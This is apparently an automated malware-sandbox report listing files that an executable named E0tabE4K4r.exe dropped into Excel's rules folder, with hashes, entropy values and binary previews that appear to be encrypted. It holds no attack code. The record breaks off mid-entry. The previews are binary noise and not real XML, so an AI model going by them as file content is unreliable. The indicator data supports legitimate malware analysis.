                                                                                                                                                  SSDEEP:12:CZ3e1+yArDoogM0+crBfj8Umz75BLkkVWFvGX3ccxyn5SUdNcii9a:CZu1pAIog5+cNL8UCBLkkVWFU33iM2bD
                                                                                                                                                  MD5:4434FEE45510221A08E3359E3D84CC54
                                                                                                                                                  SHA1:332C0B5AE9199239FE682C9E641A31417BFD32B0
                                                                                                                                                  SHA-256:9388463A3382BBB274D2F274457A8537DBF542666E897112F8C84C52C431190A
                                                                                                                                                  SHA-512:1B01F47BA59DD1C262FFF80E250D2D91D8B928D48C7B3B73A109AF31FFDFA195114A180B53248AC2E40496279D8F312EF2BAD8E0E62C7E0E03B94142CF4659C1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml........ih...j...m.......y7.i.U.r..~..............5P,B.L..'EZY*1.J>.pC}.e...X....;..@.:K .g.J.H.,...O.N...&p........L.8.j.%x.c..I.k.......*M]...q.;...*..j..l2m.,T.=.\....H..U......wI.......O..&[Z.L9Q\...{..).W.,7.8b...r..Y?......#.j.ko...O.b....R.]...R..H.{(.Vj.C..].S.z....>^=9.W..'.......d8i........xB..HdFU.6W.U..h6...../D.;.1M..R+..r$y..F...O.n..%.r..Z.....^...?..J..i0..?........@.b#.G.....-...NW....ep...6.Ev...&....ux... .z..qe..o.......IO....no..(..4.....+.....ZW...4 .....2..~Y:..x..GJ5...,t.....?d.......ck.P......S.....`.Rg1.K...(.E7Ft4.i.s.....~m..].DG..a;....qT9TBV...b&......4.+3mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170014v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1707
                                                                                                                                                  Entropy (8bit):7.891881817338036
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Agf/L7fX/pMYqzOnKgbSRdBzmRrisYaN0JWi8zoIPWkTyuR1bbiBk7YgwwKvaqF+:T/PfvpSWtN4IoNkTyuRBbiBytUvFqnD
                                                                                                                                                  MD5:8D75938D9CA823585661F98CBF13A06C
                                                                                                                                                  SHA1:E059C4B0432939074EDD775DA4D79E8101630604
                                                                                                                                                  SHA-256:505BC744BAC1287BEB3BD73B41AE094B5A591D0273747F5A786217C67C5D720F
                                                                                                                                                  SHA-512:028067AE491081F600CBBC9D5277405E67E5C14504831402826869785010BC082D3D41DB7553A3A3C838D253DB14FE7C11416E6FE409392ECF71919F2082F73A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlRhT...0(.H..=I..g......#....y..pR[q...s..bQ.N?!.N.[........{..D.jo.#/.)Ih.......O[..'Xu..O.)%.v.(F.gu..|......M.6.Y0y....C.\\,v_..o.....L).#.(...!3...G...@V**J3........*.0."^.^u.....b....A........-.\l.<.o...L.._O.d..f..8.5.q........B....b7.L.b..A&.,...d.;qs.tN.\........-.a.".3.y[..@-'..f.Q.Hp..;.r!N..w....g1.o$.'..}.ue.}..52.u.^..............n..kyc.d...l.X.2.k.O...........z..Rv...D>.|z.......V.G...G|...~,.%..9X.2..untw.2.W.T$X.x00Y.........(...'..g.i........@*.Q..=K....wY..Qr..G.6g..%.._.eE..]^..U...j........Q.Yh..{.D.:1`....|&...U.....Bj.....=.U.\....gt._.0d.U....Z...o_.3..AuOOj...$...Aff.W...1.|.[....g.....k.....M....?.......u.h..U.h[...a.:=W;.;..2..8..Q..A*....a.9.K...rn. .7#...S3~2X..8.....F|g...'^^aL$#.t..ex..cZ^tcr....j.S.wI.[B@..81.....P.,P...L...l..."5A....MSX..MC......W<...c....~...........T.>G....$.v@...}.W.MZ.../.z....../%AL....snI#...~..:...4..e0*.}....(.F..s..cV.0...'......N..3...h_.6R~........Fd.1p...6@...td...v.2..{R

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170016v7.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2111
                                                                                                                                                  Entropy (8bit):7.905445758946532
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:5Fyqs0DJa0PIjKcvvYZD8tJ/13TVcPFSzh5J5ZHKHD:5s0oesAD8fctSz/ZHG
                                                                                                                                                  MD5:BFE6A9399544029335A307CB08B649AA
                                                                                                                                                  SHA1:3D2F3928DDB7FEC64B9AC4A4B6D3754054811D8E
                                                                                                                                                  SHA-256:D77D60A87B603EB532474605FFD338C4BC091AD48AE9467EA3DBBC783A88902E
                                                                                                                                                  SHA-512:3852F1EE5AF8E4E3779DE2D44E8583337906D90D8F6D73F3760E4EF7833E304CBFD0A958D10ADEC0F173379870A35917ED0BE5D45236A135AC63EBD16C2E8C31
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...w)...~..&?......P.R.>.f....:{m@.......u.7{..}E(CX>..#4.....:.*Z...s.!...n1..\.@...*..U.....#bSO.Ho.__/.........7.J.T..A9..q..xxt...m..V.`1n.......O.3.9...6...S0...yH=#.._.....J}.6....=...x.o..J..T.:.;f&..)..t..mS...c...Kc..=(... ...\..|t.*.7<.F..Y.__0u.O.0.....0V[.(.96Tl.`0a....j;|...I.g...EC..>.$...z....kR.]}..).d.........O>.....&..K..E.t...X2..|..... ....M5Y.3..h...,C.U..pR.Fx...La...K..s.w......F.Hy....b..`:..Y..Qum...u...'C..c6.$v.h.7 .Y>.G].."..N.m.>%...d.d...r.aaC..C.....c..Sp....L.....;.+d/...pu.....6.kV.........(<.#.si.5......R...M..)<.{k..n..S/....r&...I..`.P..tD.D..Y...AY....,0O...5...HS."V3.."d.........#.3._.%.E4..d3...NG6.....9.A.Y...|c...v...r.3.i.J .....$l....el..b....I.s..../.....geY..<<.9........6t.R..)c...<0....!Z.M.?.4...x.....l.>..........<Y.|u-zH.d...i.....}....b.#y.c..e...-..d...U....Yy._.f+..*.q.re.F...s.-.. LY...X..NYs`..5.../LEG._.'..}..O...7..d...g......C..D.[&7..&O.X....vzz,...d......RR...2

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170019v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1732
                                                                                                                                                  Entropy (8bit):7.885484427936308
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:906OSYoGu3eK2Mn26ldbAUkvKcBZJY9lOnH+jT2dgD:W6MoGwh2Mn26nbA1JY9lOnHKTK8
                                                                                                                                                  MD5:00CBD31C38577CA97E81DCA022336CFE
                                                                                                                                                  SHA1:5F3BBC719D5F4071508C2E4B4B67E4107445123E
                                                                                                                                                  SHA-256:103045899E9C6E9E2FB478B6C614B893E46DAA322E842310DCB42EB9B4670932
                                                                                                                                                  SHA-512:A5420409B50901D36380118A3F4B03FBF68F41BE531BC668A7B34FD452413A1BEFD55B89EBAF8FDE57DCB624CA63C045BF80A29522EB81117C8E151A9FB295DF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.L...o\.f.r.d.p.-...c...<.!.U&....Q......8h2...bT...oI..6.(:6./....@y"~'....'(..cU.......\.O..^...\#v.+..#...@.]..!.|E^.q?.U.,j.#.J.J.......x...W:.XE.o..D...xG.p0*.{.q....\.pN...H...........p.q..........l.S.i.m....i.........t......{...C..%VO..M.zck.........n..gw^.|..w;.......U...H...M7]R.....*..z.....|.....DK.~7#...7...e..{..7.O...o.O.....XGa.T....DQ.*.*$..^.H.0..R.\C...Eb...\.:13... .r......%[|....:_....1*'N....\.(D....,.Z{.%.....p.....N8..l...T...9..j..Y#..l]....l.....J..1,...*.q.Ce.SW...;u...Co...(I.%.Y........'es.......=g...9..L.5N.Fo..t...'.L...'....&.U....MZg.dR.?.bj$...P.4h.W.M.h.0*Ir]S.n.x!..i.....;.('...3&.......2..d9...\.YK.r...)...1e..-h.[..rct.....^.d..,m}a.U..[<.#y..O..=."b..%....`...z.G.>..Z'...D..V.(..`D....D.}f.:.....B'z..Ud...H.h\.......?}.H8.<...#,...A.Y..}....._...........1....x.m..LE...V,e.i..V^...R0.l...t.=wS....Qj..T.........'.v....v..N.>"g.h.eP...._-..Qad.y..G..9..3.^....g.C..Q(..f.q...u.u6.....D.3.,F.bXU

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170021v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):935
                                                                                                                                                  Entropy (8bit):7.7351302721885915
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:U3kVZ01+x2hNSfnGV5N0d7N2qLXQ0kv2bD:jZ3kNSfNr17kMD
                                                                                                                                                  MD5:301581C6FC867C25B023F2D4CAFCDF3C
                                                                                                                                                  SHA1:B3041DC968F35796F1635715FC2CC8D79D1A769A
                                                                                                                                                  SHA-256:EFB4ECCE6F39832E33310875DE09DE7DDF9065218E68174A840CC95DA4D3454F
                                                                                                                                                  SHA-512:5E5C82E509470D1E0AC5F24B29CED60B6F57475119BDF0F349AE4AAC185BD6B5EACF94A7686D888EE0EE4C321408D6E06FA43FC69780456981976238AF852F19
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..A...T...mL.Xj6.G...+x..Wd....5..P...n.y....6.Az.8(.....Q?k.....FU&..\J..<...........p..x..0..4..%..........C.........ER.......b.b.T.`.....$..P...m..?R...X7.v...:.7.I.N\....o\._.|.`.Y...D.N.6.v.k@8....I.O....=........(.~..._#.rY.v.......4.V....<.......U...9.J.....4...7a..j.s..8*.c......_.!...~..p.... R.$...2...:.m..S..C.....6...VJx...W....W.P....9F]w.Zb]...&....`.;[.......1Za..s......R_.....}=....1..$.0..r......tX..`A..ZNr.. ........|..+.6..2,..Dh....(.....7A.hy.1k...$.....,.=....Y.$ D..`...`a...n.^.!.]!...u...;.C<......O.....o2......H&...9.0.f.d..92.....S..B..c(....Z6w.y.X..3.....=.@4..rP_J.Z..i....pGb.F..U|aG.......z...........X..a+oC....o.J..........N... ..S0..zn.........2..;&`...&p...3..N.....z...{...p*d..7E..D.+Q.X.....>i.%5.G.q1{.0n.5m.D....k....u+.H0?.r..E........\...^.9.....^&t.,.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170022v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):980
                                                                                                                                                  Entropy (8bit):7.781146239072248
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ysSbOyb4wX4FGZIxzjESFPg7cZaoh8f8P2bD:RSaInXCoOrmdbfbD
                                                                                                                                                  MD5:8A7837BAAEBFFEF69D3D8F594F25975C
                                                                                                                                                  SHA1:303E79DF1CB4B812E193DC5D0521A39C32A70522
                                                                                                                                                  SHA-256:4331DFE1B5053745F447478FBC64781008FEDC95302015E29889A42F5B513955
                                                                                                                                                  SHA-512:D5B71DAB3B9DD47C5434EFE091F2F60682DCF5AF3B5FD47CDC597B05676FBB1405976E140FE5B4328665E49A1E360C52A0606CB573A9F1E7F672508A823058CC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlV.....c....Ud.o2e.o..}.J.#c%.4D.Mh....H..OR2S..:..4)E.&*....5..#..+g..&.;9.o{.}.e..........6BV...zu|...NlmhJ.;..v...ba.h{.t..6)..;..h...._..4.|BO...cZ..A6.v.l..^}.......x.&...W}....~...w....$.<;.C..Wt.Q.{_.LQ........:.....'.......#u...E...^.n..G..n. .5.'.t.M...uS\.e.).1..>.....4..BRJ!N.....:........0..r....?S.T....zV@5....Y...8...=..c...>*.%...|-....:.6&...........:,.2..k..~+&.....3m....?| 9...wQ.S5.AA.t.|.n+...,....e..].Q=.._j1.XI.....w~...s..kb.-......W,b..UZ.$...O..Be.]4..&.Y8.Wa...J@...^.j.[_i.Yz+....{.=...X....7.mx..D.......R.D<..H~\n...P. .gzL.g..|.c7e.&..<2.....!.d..mg4"`h\.....Ud.\-....Fv,P4..@"!.v..V..wN.T,$.....*..r.....VU...<..I..%.T......}..W.7...[psm........e....BU|..8..1F....5......GT....M.s........R.w...ca..8u..QuRY.m.w0.]y.20..1x\......>.wRV./.....9 .$.G.../.C7A!,..$U...?.'.EB........8]EV|[..../...s..$q.`.....=.{BF.vP.]8...#"mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170024v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2312
                                                                                                                                                  Entropy (8bit):7.919931676599379
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:MwQQs4jMqMjY6YqfENstVsdA43YnvP59rK4hO+XrRaZD8qbLsU7f7V8RD:NLs4jBIHYVNI6An9dhtXrRatXsU7x8Z
                                                                                                                                                  MD5:F6C6C1A19A2805CA448E54EBE33D9ACB
                                                                                                                                                  SHA1:39590D9604F6D616ABA8CECB76696D23C0905884
                                                                                                                                                  SHA-256:6E3A5103F3D28D26F05E402D13D3B82F4AE13999094F4D8DB98EE250464AA6FC
                                                                                                                                                  SHA-512:4747B9A79C27CD173D2BAE2160D8D34D0B8880B1FFFB2E9FDC65ED29E5A7D4617A230CC240FA48B55D4453E2790A082AC633ED01D530C43FEE8B0E38BB04C79E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml;Y.Z...X.;...b.V..n..X..L..>$.?...6.v..u....~Z{.....mD.0,...3..m..$..O3.0.z.Q.m!.V}.Q..v._.U.!Q........^`........x.J..W.....`.......?....8.)..j..[..(....:s.t.A...|.h..........5.*...x.....QB.28..m...X..X.*$}.:.I.=3.gJ..U....>.a.o.*{p.......9.}...../........).'...:R_..^2.c8.^ .....A.tA.bB}.}._.k|x..]...~...k.I.._.....;.AFP......j..O>|..$*&.^.m..7U..M.X>..]..w,b...E..k......mH.?.2.~.{..W.4.E......|.0.......r.5..z..q.nr!....H;....?....E'.N..d5.J!y....x..).$..f.........m...3|&.3.%f...h..}.M....^....b.J.O.P....D.N%3...S......Qe.... t>`..i..dP..).~.....<Q.#,...f....Vy..z...j.6.(.+....>."...... .n....h.SL..B.ViB...%...|x7...zRFRrp8?..X... ...x..\.L.N..MB*.y.@5.....>.YD.I.C...%....F.4J?.+)eBF7ue...P!.h...F..D|9..tG0.F.u...X...u...x.d^X."%J9z2eB...0.....:..ZL.....U.......t.>..`..._.*g].V...s.qgB........|.s.:..I.....I.'f.l.d..O...p.*td.....e.....6......K..0..Q...u..&.n=I.1..n'.".(.<./2hd..0..}.m.._l.x...V..x.[x.....@..y..,......;.B*..=.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170026v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1731
                                                                                                                                                  Entropy (8bit):7.891863063297123
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:z9pQh1gYR0icOSeImIcHA4UKB/0u3+CshX1PYKHxbGv6yvCbu803jmMSOq7NSRA9:qV7fHA9+NK1HxM6Uu4K/NqtVvc/fD
                                                                                                                                                  MD5:EC6355D3EBBACBF51B39C891924C97F5
                                                                                                                                                  SHA1:C9B0937584E6AFCCEC54B3A49F38DBBEA81C363E
                                                                                                                                                  SHA-256:D145F46BB7C8A1E31D426897CC341ABD7150E05347482CFD64A31099FA114027
                                                                                                                                                  SHA-512:02FC38B4CC51C24B4F609942027F8F7E9561837C56F0D5D54F31F4EA7AC65AB205927A875CC3A4FA3456F86EA5D23C1910D340797101DB5327C1CDECAA304985
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..].....g..d...V0....H....N...6.....A~@.?.}H.-...P?rZg...%..~W;....W....v..".....E#.R.s..L.-.@..0...~..ZE@N]9.U4l.....(vDRL}..H.7..Y.e.K..I2A.....|C.."=.9...H.V..k.A.$<.....+.?.cG...(.B..kb..5.R.3....R...g.Ft.w......3...o..p.r..E5..6+\.(.#...l.......#..;.W.........@.a..*..@".J`.t.SR.3..+j~cn[.m(a:.1cP..v.......rf].|u.Cd<h26if]...v)....K-.}...o..,.....+....r...%....U...SE..a.....)N.. t....'F+.q..9.P.f....n..Vy..;p...;.........:..o/....@)..Ua"!..o........\.%|..q..R............f.j.....K!I..JSL;...O...n.=U.......\.i...h.X._".S.b........%.U..8..vK...L...v...z...!..........@._...;..G].'T....i..........z.e.:..t....E.wImp~0...2`.'VA.~..&.(>.D.)....]%..%..I. ..jW.......R..<.......a....2.....R....S.m.YXVP...).R..%X.~.|C....q..bk..F).L.Z*8.uBgi0zYyoW..WJ.#..j .2.1o..8bP...j..}0.-.+-.$..$.0.P...H.&ps.i7A.U..3_...._..<.Ci..|.T.b...U..!..Q:5m.p.Z.&&v_........j..i.a../..%......X.....-...|.....C.'h.g..Ijl..V.....QD.+....-.9.J...TZ.*..E.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170027v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):916
                                                                                                                                                  Entropy (8bit):7.771000557999312
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:sZvohmh858OIyQm+LqUiuLjkmCjPPTNvngfdTKQI2bD:sZN8lIisjGzPpPgFTKQ7D
                                                                                                                                                  MD5:9E3947F43FD46A64FCF26D66749C8DC9
                                                                                                                                                  SHA1:E4DFC1CD8C354C04B230FA863792E5A4CEB134FE
                                                                                                                                                  SHA-256:F04CDCE3266BEE5A774C0C67A59C661C24BF92AEE57879A4B4C5736065F5FC0F
                                                                                                                                                  SHA-512:141C976E9061EC8825C25DC9DFF490CA153A6C3B4BE0494C099545573C664967BD7ABC0A0A73778C3F73AFEB2F9AFBD141E528CEBEAC2BF9C0F3F15A014B805E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.%...m..!......F.+..R...&...!...i>M+......:...CZLt....8.|....6.E.~b=..<..6$.*.8._.".C.;.......7@.5.-..Es}Hv......0.'.....9p....K,.4.u.i....[(!.l7.2.@k..&.m.$@.....x..W...|3...ZK.?.t..8}.[Nd;.L"./n...@.Fu.9..2...."R`.q.o...........X.. !U..C.(.....Ax'.!....VR.d....LW..].h.....%R..A8Gyv'"....W....'..G..]M.|./`....6..=....!..K....\(...l.i.....O.g.~{u.\E.h.a+.P.b.9......db...M.fv^[.....|...n.k).i.....L....e}..|.F.....<.........&...*..]L.l.....V...]....M...#.q]NCH*Y.+.4.V.h......O.A..Al@....1"....4U..G.*\DE.46.-.|..sJ....JQ.o^.fmk...k....wRl..*..T<S..e.78e..t.......k6.b.^..LU....Q.P.,....:+.!...z....uH.>.[:..]?a..^Q[.[H....._....zTy...u......}.bE...:......)...~q}.ep..H;........$.^H....:.......|.......X5Jj. <j..7ds..r.t.X9...M...#..rg]...i1..s.O.?8.:r.x.1....u.m>B.M....b..M..;...\.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170030v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):887
                                                                                                                                                  Entropy (8bit):7.773512376265679
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:t6y8ahE/O+9563lJkpXB2ufBE3bBowN2bD:tjq/OY61I2uJW9olD
                                                                                                                                                  MD5:EC847DDCCA3A058063ACA6ACE3B22900
                                                                                                                                                  SHA1:88F1708746F7BBF317C782C251FA73E9E489848A
                                                                                                                                                  SHA-256:CC3F6DF5B1ED3B15E6D6B9C3FCB5D3B5847EB86A135FDC079A0514D7C92A81FC
                                                                                                                                                  SHA-512:5730965E6FB74ABE83598B50D28B636174CAAA2A1904801DB46594D2EE2FEBE3809B09A244161582E7053EA0F2D86B4F977812F63F6F630970EB1F516F7539D3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..\.HO.D_Z.u>...D.Y..f.w}.(...........}H.......J.e....Kd8...xz_`....ek.>O.^T....+DbW.'g.4.&hU...ZHF#.L..{.qC...=....%<9.t..?...........h.7..Jc#..=S.<.0...P:i.M..H.5...8N@S:1br.....N.~)..!k..3W<.xE.r."...X....4/.[R:...........!..&.e!@q"..nX....x..Q.j[.7r.7.....I.7(....+.*x.D..z.D.N..,I......T..x.4.9."....f.s.;.}...c..Eb..n...2.V.? ~..5G..R...=.%%6.;ZN...x.%.g*.ri..Ve...e....P..-...Y)...%3...@.j...gwR.e..{.,.0h.1f.._:.]\..d..i_n..................+.n(.<..T.`s....{hJ.kq.<..k.Y..oM.0...EA....k.?SO..M........3..c. ...L.C..r..u..N.bG.....q.&.].H......Kw.}.d@.:Z'O...~..O.*...w2.h...g..9.G.Co..NgY....-`.....Hc&...N......yH7..{Y4..*.+.k1..3......'@....b./.L...p.~".T...n..m...2Y.w.|y...jX.$6h..@/.L#.....[.....].e.....]Pq...5c.L..St..O..{{.Wep..ZN.Bm....&_.;..1@.w...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170032v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):975
                                                                                                                                                  Entropy (8bit):7.744090507374444
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:pT8ei+gPzv9XGBJyQNPdhHXzvYOK0l2YlRnk2bD:58PjCJrhL1K0l2SD
                                                                                                                                                  MD5:06E8BB1838AE39FE0AB152EB02DEEEDD
                                                                                                                                                  SHA1:E9DCDE8397B1C5D931488C183932BBDE977CC669
                                                                                                                                                  SHA-256:24A8459011923C24694B0F3859047705BC7F20B1688427CE04085303EB5CF49D
                                                                                                                                                  SHA-512:9F4CBC41925F96A626677C10C0B53711B956FCCD6084797B7BC4BA687515DFBDAEC30D423299674FD0E06DD194D9CC275B82D8A6AC3353ECEB823D95679313A5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..w..u.u...0.a.o..T.?.F.(.v..`C...G.=rk.......|...[.>w3.....t..X...e.|.5...!...IH.L!9.....R6..?...3...)..rk..4..{.@.`.+.....b..Cw.N.5..rVn..0....4.o.O..JN.._.9.i.......e..<rT....6....p~;.=c..].?.WH...P..M.*M....H>.u...@.I..U......iJ.z.L6?.J...i.c.T.fG..Z'}n_i.c.L&...s..yCw...h..T.E..d..A..d.....x.t.2j..P../.#S......t.X.<..;. ..........)...n.%..m?1SZ0...La..._[...UP.+...,JEn.0g........t)....v6K..i.}1......5...rt.Z....0./.9....Y.Ob.*..Z.*.w.......c........|@....:X.?#a.....6....WF..j5q.........h`.../...,.u../.|...bk..H.m..3|.F.*...............x...h5o..l[............g...4....A..c..J...:D....B.c|.-.;.W...w/L.e..+.{p....F.1..n.4..Jt......!...G.....1.Z..b...w...0....W..7......S..+...SC.}...9+M....q|.~.......(..|.qj...h...p...&.\Y........+vRJ...Z.?..'7......._7D....3.E..............=.r.,.p}c..p..{!.$. .....p.SX..X~N.@,......F..B.q.P.......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170033v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):719
                                                                                                                                                  Entropy (8bit):7.70570493363825
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:E1N9/Ju9uwga217dAg1drYh5+4uPRSzbOFfLXm25fqj9+X6mWSUdNcii9a:ADJu0c21ZAg1drm5duPRSzbO9Wafqj9R
                                                                                                                                                  MD5:BD51480899911A96F857FF8AFD61AB24
                                                                                                                                                  SHA1:5893CBBB700BA7526D075B4E39680AF80E03E43A
                                                                                                                                                  SHA-256:342856666282057EC50C178EB4BC809159AA86B0144E7B3E8523137A222E243D
                                                                                                                                                  SHA-512:E42F2ECED25B8539A595EBE38160BE00DF5657477699D15A93B1681CD01BA47DB8F8258614A57668F5495CA77BE26AD489135B208354B27756C0667A53B8C33E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlv.........BH|y...!7...W"*..,.......Cg..........w......i....b...f.P.o........s.o..4....;....3.x.........WTe..byX....3..{.LT.....v^.R.-v..M.......B...%_d..:......Rq.-...Q.US..r..m.S?.+.K......o.O.O:.>......S..#.2qi.....t...&..a.#.....3.\..!.'Y..JFx!;.........R....k.=....N.....h.%3_.......S./\7......Am..oL..v..1..{..aP[.V.--..u..g.....H....7^.........'R......._.u!..lU..{..Eh....%.........i.@...:.7..2M.XQ..Xw.q...^*,...q3.X... b.T2..'N;m.....0yd;..-..;..`../.u........b..d.t..,..7....d...|"t..-.h.T.C_.....]......:.C.c|jaq`.....oT'.)..M.<...H].........Y..........@......R...d....<....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170034v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1031
                                                                                                                                                  Entropy (8bit):7.783001481516292
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:CSmEfLfsmPP94X4SM6edcCWan+wJXyyDam70r/pl+2bD:CSmErMTM6ed9z+ey+am7gpDD
                                                                                                                                                  MD5:0D9FD1EB56F02BC235A13F5A27456C76
                                                                                                                                                  SHA1:46010138262D4B70E5056425C173DE88DF4A7074
                                                                                                                                                  SHA-256:9DA62BD9082F92DDDAA07B008A10FA8071ADF2A6C0C4D5F94E60CC8661ACAA21
                                                                                                                                                  SHA-512:497F350A0A96DAE9FD4D12978FE67BE1DCBD31FA95A88700D152D1764CFE7C6360497FED32D76E748032722C6FD8E326300D0253B97AD9DF0E9B044F8CBAB7E8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.\...(]Ron........T;.W....%).7.....N9...d2.,.u.....)Z>.?.(.\..+.t...y....Y\3.-.&..R..*..o@B%....s..M......r.E.......C.......)..s........Z...o.`.....':....@;....L.....J...m.U...x.I.../ (..W.B..."......9....E..X.T.}..J.......{p..E.<..p.C.<..]..O.H.!..Lip1.*...u.)..h........>...Ew...H.i%...Of...1...z.+......x.....d.da.....G....W..d.6..I.Y5..P.T|.5..?..?.a.cy[cS...+C.0&.b.s....?7...>.|..@.o..sc.R.......j.wJdp....^.......F.c..I.v.|..f8..1..*....^..\L.m#..1.V........ .O.Nm..8..........b.G..V..8.y....U....F..j^YT.."T..W22T....B.k,.Y.........Q..V7HA..i.(P.....e.. .@...A..T .j..O..`..lg.s!-...b.?..3p....bZ.+....n[.'vs.......(.Y.|..3....C.u..y.!lx...&.#T6.....Z...{..>.d..1........s.1..;.........)..[.'.~..8.T..j........+2.>...;...n3..20...nk^...+...MY+(.$%. .....n.....S'.<.....wg.!g.....$'~*:.H_D.......L.....1.>../#4...(.P.....W.[....|...8..p........L....?..z.......u...s.`.....*...7...{>t.ZmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule170035v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1143
